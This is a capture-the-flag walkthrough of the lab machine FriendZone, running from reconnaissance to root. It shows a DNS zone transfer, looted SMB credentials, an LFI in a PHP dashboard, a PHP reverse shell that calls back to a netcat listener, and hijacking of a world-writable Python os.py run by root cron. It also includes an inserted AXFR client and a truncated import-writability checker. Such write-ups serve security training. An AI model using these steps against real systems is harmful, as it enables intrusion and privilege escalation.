FriendZone

Reconnaissance: NMAP

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.123

21/tcp  open  ftp         vsftpd 3.0.3

22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)

53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu

80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software

139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

443/tcp open  ssl/http    Apache httpd 2.4.29
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time

445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Aggressive OS guesses: Linux 3.2 - 4.9 (96%), Linux 3.16 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.18 (94%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 4.10 (93%), Linux 4.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (93%), Linux 3.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -39m59s, deviation: 1h09m15s, median: -1s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2024-01-08T04:58:12+02:00
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2024-01-08T02:58:12
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.15 seconds
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.123   

53/udp    open          domain
113/udp   open|filtered auth
137/udp   open          netbios-ns
138/udp   open|filtered netbios-dgm
21847/udp open|filtered netspeak-cs
36669/udp open|filtered unknown
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.123
┌──(kali💀kali)-[~/Desktop]
└─$ nmap --script smb-enum-shares.nse -p445 10.10.10.123
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-08 01:24 EST
Nmap scan report for friendzoneportal.red (10.10.10.123)
Host is up (0.47s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.10.123\Development: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\Development
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\Files: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files /etc/Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\hole
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.123\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (FriendZone server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\general: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\etc\general
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

Enumeration: HTTP Port 80/tcp

Start with HTTP, since both 80 and 443 are open. The page at http://10.10.10.123/ shows a contact address, info@friendzoneportal.red, so friendzoneportal.red is a candidate domain name; keep it in mind for the DNS enumeration.

View the source (view-source:http://10.10.10.123/) to check for anything the rendered page hides, then add the candidate name to /etc/hosts:

┌──(kali💀kali)-[~]
└─$ sudo nano /etc/hosts
10.10.10.123    friendzoneportal.red

Gobuster:

┌──(kali💀kali)-[~]
└─$ gobuster dir -u http://10.10.10.123/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,txt

/.php                 (Status: 403) [Size: 291]
/wordpress            (Status: 301) [Size: 316] [--> http://10.10.10.123/wordpress/]
/robots.txt           (Status: 200) [Size: 13]
/.php                 (Status: 403) [Size: 291]

Nikto:

┌──(kali💀kali)-[~]
└─$ nikto -h http://10.10.10.123/

- Nikto v2.5.0
+ Target IP:          10.10.10.123
+ Target Hostname:    10.10.10.123
+ Target Port:        80
+ Start Time:         2024-01-07 22:11:15 (GMT-5)
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 144, size: 577831e9005e6, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /wordpress/: Directory indexing found.
+ 8048 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2024-01-07 23:13:07 (GMT-5) (3712 seconds)

Enumeration: HTTPS Port 443/tcp

Requesting the site over HTTPS by IP address only gives a 404:

https://10.10.10.123/
Not Found
The requested URL / was not found on this server.
Apache/2.4.29 (Ubuntu) Server at 10.10.10.123 Port 443

Apache is serving name-based virtual hosts here, so a request by IP lands on a default site with nothing at /. The certificate's commonName from the nmap scan, friendzone.red, tells us which name to ask for. Add it to /etc/hosts and run gobuster against it over HTTPS (-k skips verification of the self-signed, long-expired certificate):

gobuster -k -u https://friendzone.red/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 20 -x txt,php

/admin (Status: 301)
/js (Status: 301)

/admin is an empty directory listing, like /wordpress on port 80, but /js has something in it: https://friendzone.red/js/js/ returns a page.

https://friendzone.red/js/js/
Testing some functions !
I'am trying not to break things !
Z2pPVHFINUs4cTE3MDQ2OTUyMzNtejFyWVlBNUhT

The source reveals a comment as well:

<p>Testing some functions !</p><p>I'am trying not to break things !</p>
S0s4ZGFJdjFibDE1NDk5MjIwMDJIbWt2TmtKZThr<!-- dont stare too much , you will be smashed ! , it's all about times and zones ! -->

The string differs between the two loads. Both are plain base64: the first decodes to gjOTqH5K8q1704695233mz1rYYA5HS, ten random characters, a Unix timestamp (1704695233) and ten more random characters, which is the "times" part of the comment. It doesn't lead anywhere by itself, but "zones" reads like a nudge towards DNS zones.

Enumeration: ISC BIND Port 53/tcp

The box runs its own name server (ISC BIND 9.11.3-1ubuntu1.2). First point nslookup at it and try a reverse lookup of the IP address:

┌──(kali💀kali)-[~]
└─$ nslookup
> server 10.10.10.123
Default server: 10.10.10.123
Address: 10.10.10.123#53

That returns nothing useful. However, we do have two candidate domains from previous enumeration steps:

  • friendzone.red from the certificate in the nmap scan, and

  • friendzoneportal.red from the HTTP website

Let's try a zone transfer (AXFR) on both. Zone transfers exist for secondary name servers, but BIND answers them for any client unless the zone restricts them with allow-transfer (the fix is allow-transfer { <secondary IPs>; } or { none; } in named.conf), and a successful transfer hands over every record in the zone in one go.

Zone transfer command: host -l <domain> <dns-server-address>

┌──(kali💀kali)-[~]
└─$ host -l friendzoneportal.red 10.10.10.123
Using domain server:
Name: 10.10.10.123
Address: 10.10.10.123#53
Aliases: 

friendzoneportal.red has IPv6 address ::1
friendzoneportal.red name server localhost.
friendzoneportal.red has address 127.0.0.1
admin.friendzoneportal.red has address 127.0.0.1
files.friendzoneportal.red has address 127.0.0.1
imports.friendzoneportal.red has address 127.0.0.1
vpn.friendzoneportal.red has address 127.0.0.1
┌──(kali💀kali)-[~]
└─$ host -l friendzone.red 10.10.10.123
Using domain server:
Name: 10.10.10.123
Address: 10.10.10.123#53
Aliases: 

friendzone.red has IPv6 address ::1
friendzone.red name server localhost.
friendzone.red has address 127.0.0.1
administrator1.friendzone.red has address 127.0.0.1
hr.friendzone.red has address 127.0.0.1
uploads.friendzone.red has address 127.0.0.1

Add all the domains/subdomains to /etc/hosts. Note that every A record in the transfer points at 127.0.0.1, so the names have to be mapped to the target's IP by hand rather than copied from the zone.

┌──(kali💀kali)-[~]
└─$ sudo nano /etc/hosts   

10.10.10.123    friendzone.red
10.10.10.123    friendzoneportal.red
10.10.10.123    admin.friendzoneportal.red
10.10.10.123    files.friendzoneportal.red
10.10.10.123    imports.friendzoneportal.red
10.10.10.123    vpn.friendzoneportal.red
10.10.10.123    administrator1.friendzone.red
10.10.10.123    hr.friendzone.red
10.10.10.123    uploads.friendzone.red
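The two host -l transfers and the hosts-file step, done in code, as an added example (mine, not code from the original write-up): a pure-Python AXFR client that speaks the TCP form of the protocol directly (two-byte length prefix, one AXFR question, answer messages until the closing SOA) and turns the A-record owners into /etc/hosts lines that point at the target, since the zone's own addresses are all 127.0.0.1. The server, zone names and IP are the ones from the scan; the function names and the hosts_lines helper are mine.

```python
import socket
import struct

AXFR, A, NS, CNAME, SOA, AAAA = 252, 1, 2, 5, 6, 28


def encode_name(name):
    """Wire-format a dotted name: length-prefixed labels ending in a zero byte."""
    labels = [l for l in name.strip(".").split(".") if l]
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"


def build_axfr_query(zone, txid=0x1337):
    """12-byte header (one question, no flags) + QNAME + QTYPE=AXFR + QCLASS=IN."""
    return struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0) + encode_name(zone) + struct.pack(">HH", AXFR, 1)


def read_name(msg, off):
    """Decode the name at `off`, following 0xC0 compression pointers.
    Returns (dotted name, offset just past the name in the stream)."""
    labels, end, jumped = [], 0, False
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                       # pointer into an earlier name
            if not jumped:
                end = off + 2
            off = struct.unpack(">H", msg[off:off + 2])[0] & 0x3FFF
            jumped = True
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode())
        off += length
    return ".".join(labels), (end if jumped else off)


def parse_answers(msg):
    """Parse one DNS message into [(owner, rtype, rdata as text), ...]."""
    _, _, qdcount, ancount, _, _ = struct.unpack(">HHHHHH", msg[:12])
    off = 12
    for _ in range(qdcount):                            # skip the echoed question
        _, off = read_name(msg, off)
        off += 4
    records = []
    for _ in range(ancount):
        owner, off = read_name(msg, off)
        rtype, _, _, rdlen = struct.unpack(">HHIH", msg[off:off + 10])
        off += 10
        if rtype == A:
            text = socket.inet_ntop(socket.AF_INET, msg[off:off + 4])
        elif rtype == AAAA:
            text = socket.inet_ntop(socket.AF_INET6, msg[off:off + 16])
        elif rtype in (NS, CNAME, SOA):                 # for SOA only the MNAME matters here
            text, _ = read_name(msg, off)
        else:
            text = msg[off:off + rdlen].hex()
        off += rdlen
        records.append((owner, rtype, text))
    return records


def axfr(server, zone, port=53, timeout=10.0):
    """Zone transfer over TCP; returns every RR between the opening and closing SOA."""
    query = build_axfr_query(zone)
    records, soa_seen, buf = [], 0, b""
    with socket.create_connection((server, port), timeout=timeout) as sock:
        sock.sendall(struct.pack(">H", len(query)) + query)
        while soa_seen < 2:
            chunk = sock.recv(65535)
            if not chunk:
                raise RuntimeError("connection closed before the closing SOA (transfer refused?)")
            buf += chunk
            while len(buf) >= 2 and len(buf) >= 2 + struct.unpack(">H", buf[:2])[0]:
                n = struct.unpack(">H", buf[:2])[0]
                msg, buf = buf[2:2 + n], buf[2 + n:]
                rcode = struct.unpack(">H", msg[2:4])[0] & 0xF
                if rcode:                               # 5 = REFUSED: allow-transfer is doing its job
                    raise RuntimeError("AXFR failed, rcode=%d" % rcode)
                for rr in parse_answers(msg):
                    soa_seen += rr[1] == SOA
                    records.append(rr)
    return records


def hosts_lines(ip, records):
    """/etc/hosts lines for every A-record owner, de-duplicated, mapped to `ip`."""
    seen, lines = set(), []
    for owner, rtype, _ in records:
        if rtype == A and owner not in seen:
            seen.add(owner)
            lines.append("%s\t%s" % (ip, owner))
    return lines


if __name__ == "__main__":
    for zone in ("friendzoneportal.red", "friendzone.red"):
        try:
            print("\n".join(hosts_lines("10.10.10.123", axfr("10.10.10.123", zone))))
        except (OSError, RuntimeError) as exc:
            print("# %s: %s" % (zone, exc))
```

Against a server whose zone carries allow-transfer { none; } the same code stops with rcode 5 (REFUSED), which is the quickest way to confirm a fix; a server that closes the TCP connection without answering fails the same check in the recv loop.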

Now we start visiting the subdomains we found. Remember that we have to visit them over both HTTP and HTTPS because we’re likely to get different results.

The following sites showed us particularly interesting results.

https://admin.friendzoneportal.red/
https://administrator1.friendzone.red/
https://uploads.friendzone.red/

I tried default credentials on the admin sites but that didn't work. Before brute-forcing the login forms, let's enumerate SMB; we might find credentials there.

Enumeration: Ports 139/445 tcp: Samba smbd 4.7.6-Ubuntu

Run smbmap to list available shares and permissions.

┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.10.123                              
                                                                                                    
[+] IP: 10.10.10.123:445        Name: friendzoneportal.red      Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        Files                                                   NO ACCESS       FriendZone Samba Server Files /etc/Files
        general                                                 READ ONLY       FriendZone Samba Server Files
        Development                                             READ, WRITE     FriendZone Samba Server Files
        IPC$                                                    NO ACCESS       IPC Service (FriendZone server (Samba, Ubuntu))

We have READ access on the general share and READ/WRITE access on the Development share, all over a null session. (nmap's smb-enum-shares reported general as READ/WRITE as well; the two tools probe write access differently, so don't rely on either until you have actually put a file.) List the content of the shares:

┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.10.123 -r

[+] IP: 10.10.10.123:445        Name: friendzoneportal.red      Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        Files                                                   NO ACCESS       FriendZone Samba Server Files /etc/Files
        general                                                 READ ONLY       FriendZone Samba Server Files
        ./general
        dr--r--r--                0 Wed Jan 16 15:10:51 2019    .
        dr--r--r--                0 Tue Sep 13 10:56:24 2022    ..
        fr--r--r--               57 Tue Oct  9 19:52:42 2018    creds.txt
        Development                                             READ, WRITE     FriendZone Samba Server Files
        ./Development
        dr--r--r--                0 Mon Jan  8 00:58:36 2024    .
        dr--r--r--                0 Tue Sep 13 10:56:24 2022    ..
        IPC$                                                    NO ACCESS       IPC Service (FriendZone server (Samba, Ubuntu))

-r: list the contents of every accessible share (one level; -R recurses into subdirectories)

The Development share is empty, but general has a file named creds.txt! Before we download it, let's use smbclient to view more information about the shares.

┌──(kali💀kali)-[~]
└─$ smbclient -L //10.10.10.123
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        Files           Disk      FriendZone Samba Server Files /etc/Files
        general         Disk      FriendZone Samba Server Files
        Development     Disk      FriendZone Samba Server Files
        IPC$            IPC       IPC Service (FriendZone server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            FRIENDZONE

-L: look at what services are available on a server

The extra information this gives us over smbmap is the Comment column: the Files share comment says its files live in /etc/Files. nmap's smb-enum-shares output said the same thing more directly (Path: C:\etc\Development is Samba's way of reporting /etc/Development), so files we write to the Development share almost certainly land in /etc/Development on the box. We'll need that in the exploitation phase.

Let’s get the creds.txt file. First, login anonymously (without a password) into the general share.

┌──(kali💀kali)-[~]
└─$ smbclient //10.10.10.123/general -N
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jan 16 15:10:51 2019
  ..                                  D        0  Tue Sep 13 10:56:24 2022
  creds.txt                           N       57  Tue Oct  9 19:52:42 2018

-N: suppresses the normal password prompt from the client to the user

Download the creds.txt file from the target machine to the attack machine.

smb: \> get creds.txt

The file contains:

creds for the admin THING:
admin:WORKWORKHhallelujah@#

Try them on the admin portal first:

https://admin.friendzoneportal.red/login.php
Admin page is not developed yet !!! check for another one

That one isn't wired up yet, so try the same credentials on

https://administrator1.friendzone.red/

We're in! Visit the /dashboard.php page.

https://administrator1.friendzone.red/dashboard.php
Smart photo script for friendzone corp !
* Note : we are dealing with a beginner php developer and the application is not tested yet !
image_name param is missed !
please enter it to show the image
default is image_id=a.jpg&pagename=timestamp

It seems to be a page that allows you to view images on the site. We’ll try to gain initial access through this page.

The dashboard.php page gives us instructions on how to view an image. We need to append the following to the URL.

?image_id=a.jpg&pagename=timestamp
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp

Final Access timestamp is 1704698027

Let’s put that timestamp number in the pagename URL parameter. After we do that we no longer get a “Final Access timestamp…” message.

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=1704698027

During our enumeration phase, we found a URL, that allows us to upload images. Let’s try and see if the images we upload there can be viewed through the dashboard page.

https://uploads.friendzone.red/
https://uploads.friendzone.red/upload.php
Uploaded successfully !
1704698226

When we upload an image (random.jpg) we get back a timestamp. Let's use that file name and timestamp on the dashboard page:

https://administrator1.friendzone.red/dashboard.php?image_id=random.jpg&pagename=1704698226

Gobuster on the administrator1 vhost also turns up an /images directory next to login.php and dashboard.php:

┌──(kali💀kali)-[~/Desktop]
└─$ gobuster dir -k -u https://administrator1.friendzone.red -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php

/.php                 (Status: 403) [Size: 309]
/images               (Status: 301) [Size: 349] [--> https://administrator1.friendzone.red/images/]                                                                                               
/login.php            (Status: 200) [Size: 7]
/dashboard.php        (Status: 200) [Size: 101]

Enumeration: FTP Port 21/tcp (vsftpd 3.0.3)

Try the credentials on FTP.

┌──(kali💀kali)-[~]
└─$ ftp 10.10.10.123
Connected to 10.10.10.123.
220 (vsFTPd 3.0.3)
Name (10.10.10.123:kali): WORKWORKHhallelujah@#

Doesn't work. Next, try SSH.

Enumeration: SSH Port 22/tcp (OpenSSH 7.6p1 Ubuntu 4)

┌──(kali💀kali)-[~]
└─$ ssh admin@10.10.10.123
The authenticity of host '10.10.10.123 (10.10.10.123)' can't be established.
admin@10.10.10.123's password: 
Permission denied, please try again.

Also doesn’t work.

Shell as www-data

LFI

Based on the recon above, dashboard.php most likely includes a file named by one of its parameters, i.e. a local file inclusion (LFI). Both parameters are worth a look.

Starting with image_id: changing it only gets us a "can't find the image" style response, so let's move our focus to pagename. With pagename=timestamp the page printed a "Final Access timestamp" line, and the same line comes back when timestamp.php is requested directly:

┌──(kali💀kali)-[~/Desktop]
└─$ curl -k https://administrator1.friendzone.red/timestamp.php
Final Access timestamp is 1704699293    

So pagename is almost certainly handed to include() with ".php" appended (something along the lines of include($_GET['pagename'] . ".php")). That makes it a poor LFI for reading files, since asking for /etc/passwd would make the server look for /etc/passwd.php, but a very good one for code execution: any file we can write anywhere on disk under a .php name will be executed. During the enumeration phase we found READ and WRITE permissions on the Development share, and both the share comments and nmap's Path column place it at /etc/Development. That is our write primitive.

Let's create a simple test.php script that outputs the string "It's working!" on the page.

<?php
echo "It's working!";
?>

Upload it to the Development share (smbclient //10.10.10.123/Development -N, then put test.php) and request dashboard.php?image_id=a.jpg&pagename=/etc/Development/test. If the string shows up, the include is executing files we control, and we can swap in a PHP reverse shell (php-reverse-shell.php, configured to connect back to our IP on port 5555). Log into the Development share and upload it:

┌──(kali💀kali)-[~/Desktop]
└─$ smbclient //10.10.10.123/Development -N
smb: \> put php-reverse-shell.php
putting file php-reverse-shell.php as \php-reverse-shell.php (3.3 kb/s) (average 3.3 kb/s)

Start a listener on the attack machine:

┌──(kali💀kali)-[~/Desktop]
└─$ nc -nlvp 5555
listening on [any] 5555 ...

Then trigger the include (no .php in pagename; the application adds it):

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/php-reverse-shell

The listener receives the connection:

connect to [10.10.16.4] from (UNKNOWN) [10.10.10.123] 39144
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 08:47:00 up  3:50,  0 users,  load average: 0.02, 0.06, 0.02
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
friend:x:1000:1000:friend,,,:/home/friend:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
Debian-exim:x:107:114::/var/spool/exim4:/usr/sbin/nologin
ftp:x:108:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
bind:x:109:116::/var/cache/bind:/usr/sbin/nologin

Filtering out the nologin accounts leaves:

root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
friend:x:1000:1000:friend,,,:/home/friend:/bin/bash

Let's upgrade it to a better shell.

$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@FriendZone:/$ 

This gives us a partially interactive bash shell. To make it fully interactive, background the session (CTRL+Z), run stty raw -echo; fg in the local terminal so that it passes keyboard shortcuts straight through to the remote shell, and fix the window size with stty rows/columns if needed (that step is shown further down). The user flag is already readable as www-data:

www-data@FriendZone:/$ cat home/friend/user.txt
cat home/friend/user.txt
69559f0496405776adaf3d141aa188bb

Priv: www-data to friend


In the /var/www/ directory there's a folder for each of the sites, as well as a MySQL config file:

www-data@FriendZone:/etc/Development$ cd /var/www/ 

www-data@FriendZone:/var/www$ ls
ls
admin       friendzoneportal       html             uploads
friendzone  friendzoneportaladmin  mysql_data.conf

www-data@FriendZone:/var/www$ cat mysql_data.conf 
for development process this is the mysql creds for user friend
db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ

The database password works for the friend OS account too, a classic case of a service credential reused as a login password. Either su to friend:

SU:

www-data@FriendZone:/var/www$ su friend
su friend
Password: Agpyu12!0.213$

friend@FriendZone:/var/www$ whoami
friend

friend@FriendZone:/var/www$ id
uid=1000(friend) gid=1000(friend) groups=1000(friend),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)

SSH:

or ssh in with them:

┌──(kali💀kali)-[~]
└─$  ssh friend@10.10.10.123
friend@10.10.10.123's password: 
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-36-generic x86_64)
You have mail.
Last login: Thu Jan 24 01:20:15 2019 from 10.10.14.3
friend@FriendZone:~$ 

friend@FriendZone:~$ ls
user.txt

friend@FriendZone:~$ cat user.txt
69559-----------------------------

One option for getting enumeration scripts onto the box is to serve them from the attack machine over HTTP (python -m SimpleHTTPServer 5555) and download them on the target. Since we already have write access to the Development share, which we can also write to as www-data, upload them there instead. Start with LinEnum:

www-data@FriendZone:/tmp$ cd /etc/Development/

┌──(kali💀kali)-[~/Desktop/7. Priv Esc]
└─$ smbclient //10.10.10.123/Development -N
Try "help" to get a list of possible commands.
smb: \> put LinEnum.sh

Give the script execute permissions:

chmod +x LinEnum.sh

I don't seem to be able to execute from that directory, so copy it to /tmp and try again there:

cd /tmp/

chmod +x LinEnum.sh

That works, so the next step is to execute the script:

./LinEnum.sh

The results from LinEnum don't give us anything usable for privilege escalation, so let's try pspy, which snoops on process creation without root and therefore shows what cron is running. If you don't have it, download it from its GitHub repository, upload it to the target and run it the same way as LinEnum.

Priv: friend to root

pspy shows /opt/server_admin/reporter.py being executed every couple of minutes as a root-owned scheduled task. Let's view the permissions we have on that file.

friend@FriendZone:~$ ls -la /opt/server_admin/
total 12
drwxr-xr-x 2 root root 4096 Sep 13  2022 .
drwxr-xr-x 3 root root 4096 Sep 13  2022 ..
-rwxr--r-- 1 root root  424 Jan 16  2019 reporter.py

We only have read permission. So let’s view the content of the file.

friend@FriendZone:~$ cat /opt/server_admin/reporter.py
#!/usr/bin/python

import os

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later
# Sam ~ python developer

Here's the source code of the script. Most of it is commented out, so there's nothing in the script itself to abuse, and we can't write to it anyway. It does import the os module, though: Python resolves `import os` by walking sys.path (the script's own directory first, then the standard library), so if the os.py it finds, or any directory searched before it, is writable by us, the root-run interpreter will execute whatever we put there. Locate the module on the machine:

friend@FriendZone:~$ locate os.py
/usr/lib/python2.7/os.py
/usr/lib/python2.7/os.pyc
/usr/lib/python2.7/dist-packages/samba/provision/kerberos.py
/usr/lib/python2.7/dist-packages/samba/provision/kerberos.pyc
/usr/lib/python2.7/encodings/palmos.py
/usr/lib/python2.7/encodings/palmos.pyc
/usr/lib/python3/dist-packages/LanguageSelector/macros.py
/usr/lib/python3.6/os.py
/usr/lib/python3.6/encodings/palmos.py

Navigate to the directory and view the permissions on the file

friend@FriendZone:~$ cd /usr/lib/python2.7

friend@FriendZone:/usr/lib/python2.7$ ls -la | grep os.py
-rwxrwxrwx  1 root   root    25910 Jan 15  2019 os.py
-rw-rw-r--  1 friend friend  25583 Jan 15  2019 os.pyc

We have rwx on the os.py module! This is an obvious misconfiguration: a non-privileged user should only be able to read standard-library files. Anything we append to os.py runs, as whichever user imports it, on every `import os`. If we add a reverse shell and wait for the root-owned scheduled task to run, we get a shell with root privileges. (The same goes for any other root process that imports os in the meantime, so expect stray connections.)
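The check behind that finding, generalised, as an added example (my code, not the write-up's): given a script that a privileged job runs, list every module it imports, resolve each one the way the interpreter will (script directory first, then sys.path) and report whether the file, or any directory searched before it, is writable by the current user. A writable file means code injection exactly as above; a writable earlier directory means a shadow os.py can be dropped in front of the real one. Run it with the same interpreter as the job (here /usr/bin/python, Python 2.7) or pass that interpreter's sys.path as search_path, since that is what decides which os.py gets loaded. Because reporter.py is Python 2 syntax, which ast.parse under Python 3 rejects, the import scan falls back to a line-based match. The demo() function, which builds a throwaway Python 2 style script and helper module in a temporary directory, is mine.

```python
import ast
import os
import re
import sys
import tempfile

# fallback for scripts the running interpreter cannot parse (e.g. Python 2 print statements)
IMPORT_RE = re.compile(r"^\s*(?:import\s+(?P<mods>[\w.]+(?:\s*,\s*[\w.]+)*)|from\s+(?P<frm>\.*[\w.]+)\s+import\b)", re.M)


def imported_names(script_path):
    """Top-level module names a script imports ('import a.b' and 'from a.b import c' both give 'a')."""
    with open(script_path) as fh:
        source = fh.read()
    names = set()
    try:
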